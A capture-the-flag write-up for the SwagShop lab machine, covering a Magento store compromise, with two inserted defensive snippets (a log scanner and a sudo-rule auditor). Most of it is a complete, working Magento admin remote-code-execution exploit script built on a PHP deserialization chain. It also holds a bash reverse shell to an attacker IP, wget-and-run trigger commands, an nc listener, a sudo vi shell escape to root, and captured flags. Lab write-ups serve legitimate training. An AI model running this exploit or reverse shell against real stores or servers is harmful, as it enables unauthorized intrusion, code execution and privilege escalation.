Service overview

$ nmapAutomator.sh -H 10.10.10.140 -t Full
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Public exploit

wget https://raw.githubusercontent.com/that-faceless-coder/magento-exploit/master/swagshop-exploit.py

Change swagshot.htb => 10.10.10.140
=> http://10.10.10.140/index.php/admin
Log in as faceless:faceless

Searchsploit magento => rce
Take the install date from http://10.10.10.140/app/etc/local.xml.
Put the install date into the exploit: Wed, 08 May 2019 07:23:09 +0000.
Add an order and change its status to shipped.

After that, run:

from hashlib import md5
import sys
import re
import base64
import mechanize


def usage():
    # Both %s placeholders need the script name, otherwise the format string is printed raw
    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" % (sys.argv[0], sys.argv[0]))
    sys.exit()


if len(sys.argv) != 3:
    usage()

# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
username = 'faceless'
password = 'faceless'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)

request = br.open(target)

br.select_form(nr=0)
#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password

br.method = "POST"
request = br.submit()
content = request.read()

# Pull the AJAX block URL and the CSRF form key out of the admin dashboard page
url = re.search(b"ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1).decode("utf-8")
key = re.search(b"var FORM_KEY = '(.*)'", content)
key = key.group(1).decode("utf-8")

# The orders tab response embeds the dashboard tunnel URL used in the next step
request = br.open(str(url) + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + str(key))
tunnel = re.search(b"src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)

# Tunnel request: base64-encoded serialized object plus md5(payload + install_date) as the check value
payload = base64.b64encode(payload.encode())
gh = md5(payload + install_date.encode()).hexdigest()

exploit = tunnel + b'?ga=' + payload + b'&h=' + gh.encode()

try:
    request = br.open(exploit.decode("utf-8"))
except (mechanize.HTTPError, mechanize.URLError) as e:
    print(e.read())

shell.sh:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.6/1234 0>&1

Trigger:

python 37811.py http://10.10.10.140/index.php/admin/ "wget http://10.10.14.6/shell.sh"
nc -lnvp 1234
python 37811.py http://10.10.10.140/index.php/admin/ "/bin/bash shell.sh"
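As an added defensive example (not part of the original writeup or of the exploit's code): every request the script above builds ends in `?ga=<base64 serialized object>&h=<md5>`, so a web-server log scanner can flag such traffic by base64-decoding `ga` and looking for serialized PHP object markers. The tunnel path and the log lines below are constructed.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlparse

# Apache combined-log prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3}')
# A serialized PHP object starts with O:<len>:"<ClassName>"; capture the class name.
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)"')

def query_param(path, name):
    """Percent-decoded value of one query parameter, or None. parse_qs is avoided
    because it turns '+' into a space and would corrupt base64 sent unencoded."""
    for part in urlparse(path).query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return unquote(value)
    return None

def inspect_line(line):
    """(ip, path, classes) if the request's 'ga' parameter base64-decodes to data
    holding serialized PHP objects, else None."""
    m = LOG_RE.match(line)
    ga = query_param(m.group("path"), "ga") if m else None
    if ga is None:
        return None
    try:
        blob = base64.b64decode(ga, validate=True)
    except (binascii.Error, ValueError):
        return None
    classes = [c.decode() for c in PHP_OBJECT_RE.findall(blob)]
    return (m.group("ip"), m.group("path"), classes) if classes else None

def scan(lines):
    """Every log line whose 'ga' parameter carries a serialized PHP object."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log (tunnel path is illustrative): a normal admin page load, a request
# carrying a serialized Zend_Log object (outer shape only), and a 'ga' value that is plain text.
_OBJ = base64.b64encode(b'O:8:"Zend_Log":1:{s:11:"\x00*\x00_writers";a:0:{}}').decode()
SAMPLE_LOG = [
    '10.10.14.6 - - [08/May/2019:07:30:01 +0000] "GET /index.php/admin/dashboard/ HTTP/1.1" 200 5120',
    '10.10.14.6 - - [08/May/2019:07:30:09 +0000] "GET /index.php/admin/dashboard/tunnel/?ga=%s&h=0123abcd HTTP/1.1" 200 12' % _OBJ,
    '10.10.14.7 - - [08/May/2019:07:31:00 +0000] "GET /index.php/admin/dashboard/tunnel/?ga=aGVsbG8=&h=0 HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for ip, path, classes in scan(SAMPLE_LOG):
        print("possible deserialization attempt from %s: %s" % (ip, ", ".join(classes)))
```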

User flag

www-data@swagshop:/var/www/html/app$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:1e:1c brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.140/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:1e1c/64 scope global mngtmpaddr dynamic
       valid_lft 86187sec preferred_lft 14187sec
    inet6 fe80::250:56ff:feb9:1e1c/64 scope link
       valid_lft forever preferred_lft forever
www-data@swagshop:/var/www/html/app$ cat /home/haris/user.txt
a448877277e82f05e5ddf9f90aefbac8

Privilege escalation

$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

=> /usr/bin/vi /var/www/html/* can be run through sudo without a password =>

$ sudo /usr/bin/vi /var/www/html/test
> :!/bin/bash
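As an added hardening example (not part of the original writeup): the rule above is dangerous for two independent reasons, an interactive editor that can run commands and a wildcard argument, and both can be caught by auditing `sudo -l` output. The sample below reuses the rule from this box plus a constructed harmless entry for comparison.

```python
import os
import re

# Interactive editors can run commands from inside the editor (the writeup uses vi's ':!'),
# so a sudo rule for one of them is in effect a rule for an arbitrary root shell.
EDITORS = {"vi", "vim", "view", "nano", "ed"}
# One command entry as printed by 'sudo -l': (runas) [TAG: ...] /path/to/binary [args]
RULE_RE = re.compile(r'^\s*\(([^)]*)\)\s+((?:[A-Z]+:\s*)*)(\S+)(?:\s+(.*))?$')

def parse_rules(sudo_l_output):
    """Yield (runas, tags, binary, args) for each command entry in 'sudo -l' output."""
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            runas, tags, binary, args = m.groups()
            yield runas, {t.rstrip(":") for t in tags.split()}, binary, (args or "")

def audit(sudo_l_output):
    """Return one finding string per rule that grants more than it appears to."""
    findings = []
    for runas, tags, binary, args in parse_rules(sudo_l_output):
        if runas not in ("root", "ALL"):
            continue
        reasons = []
        name = os.path.basename(binary)
        if name in EDITORS:
            reasons.append("%s can execute shell commands from inside the editor" % name)
        if any(ch in args for ch in "*?["):
            reasons.append("wildcard '%s' lets the caller choose the path" % args)
        if reasons:
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            findings.append((binary + " " + args).strip() + ": " + "; ".join(reasons))
    return findings

# Constructed 'sudo -l' output: the rule from this box plus a harmless comparison entry.
SAMPLE = r"""Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("RISK:", finding)
```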

Root flag

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:1e:1c brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.140/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:1e1c/64 scope global mngtmpaddr dynamic
       valid_lft 86022sec preferred_lft 14022sec
    inet6 fe80::250:56ff:feb9:1e1c/64 scope link
       valid_lft forever preferred_lft forever
$ cat root.txt
c2b087d66e14a652a3b86a130ac56721